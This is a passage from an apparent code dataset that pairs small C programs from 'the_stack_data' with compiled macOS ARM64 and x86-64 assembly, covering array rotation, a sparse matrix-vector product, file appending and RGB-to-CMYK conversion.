## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl $-1, %eax
movl %eax, -20(%rbp)
jmp LBB0_1
LBB0_4:
movl -16(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _RightReversal ## -- Begin function RightReversal
.p2align 4, 0x90
_RightReversal: ## @RightReversal
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl %edx, -16(%rbp)
movl $0, -20(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movl -20(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rdi
movl -16(%rbp), %esi
callq _Reversal
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB1_1
LBB1_4:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _Display ## -- Begin function Display
.p2align 4, 0x90
_Display: ## @Display
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl $0, -16(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
movl -16(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB2_4
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movq -8(%rbp), %rax
movslq -16(%rbp), %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
## %bb.3: ## in Loop: Header=BB2_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB2_1
LBB2_4:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -52(%rbp)
movq l___const.main.arr(%rip), %rax
movq %rax, -48(%rbp)
movq l___const.main.arr+8(%rip), %rax
movq %rax, -40(%rbp)
movq l___const.main.arr+16(%rip), %rax
movq %rax, -32(%rbp)
movl l___const.main.arr+24(%rip), %eax
movl %eax, -24(%rbp)
leaq -48(%rbp), %rdi
movl $3, %esi
movl $7, %edx
callq _RightReversal
leaq -48(%rbp), %rdi
movl $7, %esi
callq _Display
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB3_2
## %bb.1:
xorl %eax, %eax
addq $64, %rsp
popq %rbp
retq
LBB3_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d "
.section __TEXT,__const
.p2align 4 ## @__const.main.arr
l___const.main.arr:
.long 1 ## 0x1
.long 2 ## 0x2
.long 3 ## 0x3
.long 4 ## 0x4
.long 5 ## 0x5
.long 6 ## 0x6
.long 7 ## 0x7
.section __TEXT,__cstring,cstring_literals
L_.str.1: ## @.str.1
.asciz "\n "
.subsections_via_symbols
| the_stack_data/73575778.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/179831996.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _sprsax ; -- Begin function sprsax
.p2align 2
_sprsax: ; @sprsax
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur x2, [x29, #-24]
str x3, [sp, #32]
str x4, [sp, #24]
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
ldr x9, [sp, #24]
add x9, x9, #2
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _nrerror
b LBB0_2
LBB0_2:
mov x8, #1
str x8, [sp, #16]
b LBB0_3
LBB0_3: ; =>This Loop Header: Depth=1
; Child Loop BB0_5 Depth 2
ldr x8, [sp, #16]
ldr x9, [sp, #24]
subs x8, x8, x9
cset w8, hi
tbnz w8, #0, LBB0_10
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
ldur x8, [x29, #-8]
ldr x9, [sp, #16]
ldr s0, [x8, x9, lsl #2]
ldur x8, [x29, #-24]
ldr x9, [sp, #16]
ldr s1, [x8, x9, lsl #2]
fmul s0, s0, s1
ldr x8, [sp, #32]
ldr x9, [sp, #16]
str s0, [x8, x9, lsl #2]
ldur x8, [x29, #-16]
ldr x9, [sp, #16]
ldr x8, [x8, x9, lsl #3]
str x8, [sp, #8]
b LBB0_5
LBB0_5: ; Parent Loop BB0_3 Depth=1
; => This Inner Loop Header: Depth=2
ldr x8, [sp, #8]
ldur x9, [x29, #-16]
ldr x10, [sp, #16]
add x10, x10, #1
ldr x9, [x9, x10, lsl #3]
subs x9, x9, #1
subs x8, x8, x9
cset w8, hi
tbnz w8, #0, LBB0_8
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=2
ldur x8, [x29, #-8]
ldr x9, [sp, #8]
ldr s0, [x8, x9, lsl #2]
ldur x8, [x29, #-24]
ldur x9, [x29, #-16]
ldr x10, [sp, #8]
ldr x9, [x9, x10, lsl #3]
ldr s1, [x8, x9, lsl #2]
ldr x8, [sp, #32]
ldr x9, [sp, #16]
add x8, x8, x9, lsl #2
ldr s2, [x8]
fmadd s0, s0, s1, s2
str s0, [x8]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=2
ldr x8, [sp, #8]
add x8, x8, #1
str x8, [sp, #8]
b LBB0_5
LBB0_8: ; in Loop: Header=BB0_3 Depth=1
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_3 Depth=1
ldr x8, [sp, #16]
add x8, x8, #1
str x8, [sp, #16]
b LBB0_3
LBB0_10:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "sprsax: mismatched vector and matrix"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _sprsax ## -- Begin function sprsax
.p2align 4, 0x90
_sprsax: ## @sprsax
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq %rcx, -32(%rbp)
movq %r8, -40(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq -40(%rbp), %rcx
addq $2, %rcx
cmpq %rcx, %rax
je LBB0_2
## %bb.1:
leaq L_.str(%rip), %rdi
callq _nrerror
LBB0_2:
movq $1, -48(%rbp)
LBB0_3: ## =>This Loop Header: Depth=1
## Child Loop BB0_5 Depth 2
movq -48(%rbp), %rax
cmpq -40(%rbp), %rax
ja LBB0_10
## %bb.4: ## in Loop: Header=BB0_3 Depth=1
movq -8(%rbp), %rax
movq -48(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
movq -48(%rbp), %rcx
mulss (%rax,%rcx,4), %xmm0
movq -32(%rbp), %rax
movq -48(%rbp), %rcx
movss %xmm0, (%rax,%rcx,4)
movq -16(%rbp), %rax
movq -48(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -56(%rbp)
LBB0_5: ## Parent Loop BB0_3 Depth=1
## => This Inner Loop Header: Depth=2
movq -56(%rbp), %rax
movq -16(%rbp), %rcx
movq -48(%rbp), %rdx
movq 8(%rcx,%rdx,8), %rcx
subq $1, %rcx
cmpq %rcx, %rax
ja LBB0_8
## %bb.6: ## in Loop: Header=BB0_5 Depth=2
movq -8(%rbp), %rax
movq -56(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
movq -16(%rbp), %rcx
movq -56(%rbp), %rdx
movq (%rcx,%rdx,8), %rcx
movss (%rax,%rcx,4), %xmm2 ## xmm2 = mem[0],zero,zero,zero
movq -32(%rbp), %rax
movq -48(%rbp), %rcx
movss (%rax,%rcx,4), %xmm1 ## xmm1 = mem[0],zero,zero,zero
mulss %xmm2, %xmm0
addss %xmm1, %xmm0
movss %xmm0, (%rax,%rcx,4)
## %bb.7: ## in Loop: Header=BB0_5 Depth=2
movq -56(%rbp), %rax
addq $1, %rax
movq %rax, -56(%rbp)
jmp LBB0_5
LBB0_8: ## in Loop: Header=BB0_3 Depth=1
jmp LBB0_9
LBB0_9: ## in Loop: Header=BB0_3 Depth=1
movq -48(%rbp), %rax
addq $1, %rax
movq %rax, -48(%rbp)
jmp LBB0_3
LBB0_10:
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "sprsax: mismatched vector and matrix"
.subsections_via_symbols
| the_stack_data/67326031.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __DATA,__const
.p2align 3 ; -- Begin function main
lCPI0_0:
.quad Ltmp0
lCPI0_1:
.quad Ltmp1
lCPI0_2:
.quad Ltmp2
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, lCPI0_0@PAGE
ldr x8, [x8, lCPI0_0@PAGEOFF]
str x8, [sp, #16] ; 8-byte Folded Spill
adrp x8, lCPI0_1@PAGE
ldr x8, [x8, lCPI0_1@PAGEOFF]
str x8, [sp, #24] ; 8-byte Folded Spill
adrp x8, lCPI0_2@PAGE
ldr x8, [x8, lCPI0_2@PAGEOFF]
stur x8, [x29, #-16] ; 8-byte Folded Spill
stur wzr, [x29, #-4]
b LBB0_1
Ltmp0: ; Block address taken
LBB0_1:
ldr x8, [sp, #16] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_2
Ltmp1: ; Block address taken
LBB0_2:
b LBB0_3
Ltmp2: ; Block address taken
LBB0_3:
ldr x8, [sp, #24] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldur x8, [x29, #-16] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "lab1=%p\n"
l_.str.1: ; @.str.1
.asciz "lab2=%p\n"
l_.str.2: ; @.str.2
.asciz "lab3=%p\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
Ltmp0: ## Block address taken
## %bb.1:
leaq L_.str(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
leaq Ltmp0(%rip), %rsi
callq _printf
Ltmp1: ## Block address taken
## %bb.2:
jmp LBB0_3
Ltmp2: ## Block address taken
LBB0_3:
leaq L_.str.1(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
leaq Ltmp1(%rip), %rsi
callq _printf
leaq L_.str.2(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
leaq Ltmp2(%rip), %rsi
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "lab1=%p\n"
L_.str.1: ## @.str.1
.asciz "lab2=%p\n"
L_.str.2: ## @.str.2
.asciz "lab3=%p\n"
.subsections_via_symbols
| the_stack_data/62474.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x9, sp
sub x8, x29, #20
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldur w8, [x29, #-20]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur x8, [x29, #-16]
ldr w8, [x8]
adrp x9, _a@PAGE
str w8, [x9, _a@PAGEOFF]
b LBB0_2
LBB0_2:
adrp x8, _a@PAGE
ldr w8, [x8, _a@PAGEOFF]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _a ; @a
.p2align 2
_a:
.long 1 ; 0x1
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "%d %d"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
leaq -20(%rbp), %rsi
movb $0, %al
callq _scanf
cmpl $1, -20(%rbp)
jne LBB0_2
## %bb.1:
movq -16(%rbp), %rax
movl (%rax), %eax
movl %eax, _a(%rip)
LBB0_2:
movl _a(%rip), %esi
movl -20(%rbp), %edx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _a ## @a
.p2align 2
_a:
.long 1 ## 0x1
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "%d %d"
.subsections_via_symbols
| the_stack_data/122014373.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #20]
mov x9, sp
mov x8, #80
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
bl ___stack_chk_fail
LBB0_2:
mov w0, #0
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -100(%rbp)
leaq L_.str(%rip), %rdi
movl $80, %esi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_2
## %bb.1:
xorl %eax, %eax
addq $112, %rsp
popq %rbp
retq
LBB0_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d\n"
.subsections_via_symbols
| the_stack_data/168892729.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-28]
adrp x8, l___const.main.fname@PAGE
add x8, x8, l___const.main.fname@PAGEOFF
ldr x9, [x8]
stur x9, [x29, #-24]
ldrb w8, [x8, #8]
sturb w8, [x29, #-16]
str wzr, [sp, #36]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
adrp x8, ___stdoutp@GOTPAGE
ldr x8, [x8, ___stdoutp@GOTPAGEOFF]
ldr x1, [x8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _fputs
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
add x0, sp, #31
str x0, [sp, #16] ; 8-byte Folded Spill
mov w1, #5
bl _fgets
ldr x0, [sp, #16] ; 8-byte Folded Reload
bl _atoi
str w0, [sp, #36]
ldr w9, [sp, #36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
sub x0, x29, #24
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fopen
str x0, [sp, #40]
ldr x8, [sp, #40]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
mov w8, #-1
stur w8, [x29, #-28]
b LBB0_6
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr x0, [sp, #40]
ldr w9, [sp, #36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _fprintf
ldr x0, [sp, #40]
bl _fclose
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #36]
subs w8, w8, #0
cset w8, gt
tbnz w8, #0, LBB0_1
b LBB0_5
LBB0_5:
stur wzr, [x29, #-28]
b LBB0_6
LBB0_6:
ldur w8, [x29, #-28]
str w8, [sp, #12] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
bl ___stack_chk_fail
LBB0_8:
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l___const.main.fname: ; @__const.main.fname
.asciz "data.csv"
l_.str: ; @.str
.asciz "Practice 05\n"
l_.str.1: ; @.str.1
.asciz "in > "
l_.str.2: ; @.str.2
.asciz "in=%d\n"
l_.str.3: ; @.str.3
.asciz "a"
l_.str.4: ; @.str.4
.asciz "ERROR\n"
l_.str.5: ; @.str.5
.asciz "%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -24(%rbp)
movq L___const.main.fname(%rip), %rax
movq %rax, -17(%rbp)
movb L___const.main.fname+8(%rip), %al
movb %al, -9(%rbp)
movl $0, -36(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rsi
leaq L_.str.1(%rip), %rdi
callq _fputs
leaq -41(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $5, %esi
callq _fgets
leaq -41(%rbp), %rdi
callq _atoi
movl %eax, -36(%rbp)
movl -36(%rbp), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
leaq -17(%rbp), %rdi
leaq L_.str.3(%rip), %rsi
callq _fopen
movq %rax, -32(%rbp)
cmpq $0, -32(%rbp)
jne LBB0_3
## %bb.2:
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movl $-1, -24(%rbp)
jmp LBB0_6
LBB0_3: ## in Loop: Header=BB0_1 Depth=1
movq -32(%rbp), %rdi
movl -36(%rbp), %edx
leaq L_.str.5(%rip), %rsi
movb $0, %al
callq _fprintf
movq -32(%rbp), %rdi
callq _fclose
## %bb.4: ## in Loop: Header=BB0_1 Depth=1
cmpl $0, -36(%rbp)
jg LBB0_1
## %bb.5:
movl $0, -24(%rbp)
LBB0_6:
movl -24(%rbp), %eax
movl %eax, -48(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_8
## %bb.7:
movl -48(%rbp), %eax ## 4-byte Reload
addq $48, %rsp
popq %rbp
retq
LBB0_8:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L___const.main.fname: ## @__const.main.fname
.asciz "data.csv"
L_.str: ## @.str
.asciz "Practice 05\n"
L_.str.1: ## @.str.1
.asciz "in > "
L_.str.2: ## @.str.2
.asciz "in=%d\n"
L_.str.3: ## @.str.3
.asciz "a"
L_.str.4: ## @.str.4
.asciz "ERROR\n"
L_.str.5: ## @.str.5
.asciz "%d\n"
.subsections_via_symbols
| the_stack_data/184518887.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function main
lCPI0_0:
.quad 0x406fe00000000000 ; double 255
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #8
str x8, [x9]
sub x8, x29, #12
str x8, [x9, #8]
sub x8, x29, #16
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur s0, [x29, #-8]
fcvt d0, s0
adrp x8, lCPI0_0@PAGE
ldr d1, [x8, lCPI0_0@PAGEOFF]
fdiv d0, d0, d1
fcvt s0, d0
stur s0, [x29, #-8]
ldur s0, [x29, #-12]
fcvt d0, s0
fdiv d0, d0, d1
fcvt s0, d0
stur s0, [x29, #-12]
ldur s0, [x29, #-16]
fcvt d0, s0
fdiv d0, d0, d1
fcvt s0, d0
stur s0, [x29, #-16]
ldur s0, [x29, #-8]
fcmp s0, #0.0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_1
LBB0_1:
ldur s0, [x29, #-12]
fcmp s0, #0.0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2:
ldur s0, [x29, #-16]
fcmp s0, #0.0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
fmov s0, #1.00000000
stur s0, [x29, #-36]
movi d0, #0000000000000000
stur s0, [x29, #-24]
stur s0, [x29, #-28]
stur s0, [x29, #-32]
ldur s0, [x29, #-24]
fcvt d3, s0
ldur s0, [x29, #-28]
fcvt d2, s0
ldur s0, [x29, #-32]
fcvt d1, s0
ldur s0, [x29, #-36]
fcvt d0, s0
mov x8, sp
str d3, [x8]
str d2, [x8, #8]
str d1, [x8, #16]
str d0, [x8, #24]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_16
LBB0_4:
ldur s0, [x29, #-8]
ldur s1, [x29, #-12]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_7
b LBB0_5
LBB0_5:
ldur s0, [x29, #-8]
ldur s1, [x29, #-16]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
ldur s0, [x29, #-8]
stur s0, [x29, #-20]
b LBB0_15
LBB0_7:
ldur s0, [x29, #-16]
ldur s1, [x29, #-12]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_10
b LBB0_8
LBB0_8:
ldur s0, [x29, #-16]
ldur s1, [x29, #-8]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9:
ldur s0, [x29, #-16]
stur s0, [x29, #-20]
b LBB0_14
LBB0_10:
ldur s0, [x29, #-12]
ldur s1, [x29, #-16]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_13
b LBB0_11
LBB0_11:
ldur s0, [x29, #-12]
ldur s1, [x29, #-8]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_13
b LBB0_12
LBB0_12:
ldur s0, [x29, #-12]
stur s0, [x29, #-20]
b LBB0_13
LBB0_13:
b LBB0_14
LBB0_14:
b LBB0_15
LBB0_15:
ldur s0, [x29, #-20]
ldur s1, [x29, #-8]
fsub s0, s0, s1
ldur s1, [x29, #-20]
fdiv s0, s0, s1
stur s0, [x29, #-24]
ldur s0, [x29, #-20]
ldur s1, [x29, #-12]
fsub s0, s0, s1
ldur s1, [x29, #-20]
fdiv s0, s0, s1
stur s0, [x29, #-28]
ldur s0, [x29, #-20]
ldur s1, [x29, #-16]
fsub s0, s0, s1
ldur s1, [x29, #-20]
fdiv s0, s0, s1
stur s0, [x29, #-32]
ldur s1, [x29, #-20]
fmov s0, #1.00000000
fsub s0, s0, s1
stur s0, [x29, #-36]
ldur s0, [x29, #-24]
fcvt d3, s0
ldur s0, [x29, #-28]
fcvt d2, s0
ldur s0, [x29, #-32]
fcvt d1, s0
ldur s0, [x29, #-36]
fcvt d0, s0
mov x8, sp
str d3, [x8]
str d2, [x8, #8]
str d1, [x8, #16]
str d0, [x8, #24]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_16
LBB0_16:
